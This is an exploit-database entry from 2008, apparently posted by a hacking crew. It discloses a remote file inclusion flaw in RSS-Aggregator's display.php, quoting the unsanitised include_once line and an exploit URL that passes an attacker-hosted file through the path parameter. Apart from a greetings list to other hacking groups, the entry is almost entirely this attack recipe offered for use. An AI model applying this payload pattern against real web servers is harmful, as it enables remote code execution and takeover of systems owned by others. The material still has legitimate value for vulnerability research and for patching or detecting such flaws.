id: 3260
date: 06/21/2008
title: RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability
author: Ghost Hacker
cves: 

=====================================================================
RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability
=====================================================================



##############################################################
 RSS-aggregator (display) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker [ R-H TeaM ]
[~] Script : RSS-aggregator
[~] Download Script : http://www.rss-aggregator.com/download.php
=========================== [ Viva IslaM ] ==========================
Error ( display.PHP ) :
include_once($path.'/admin/fonctions/config.php');

Exploit :
http://xxxx/[Path]/display.php?path=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE
Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..
All Member Real Hack And All My Friends ..



#  0day.today [2023-03-22]  #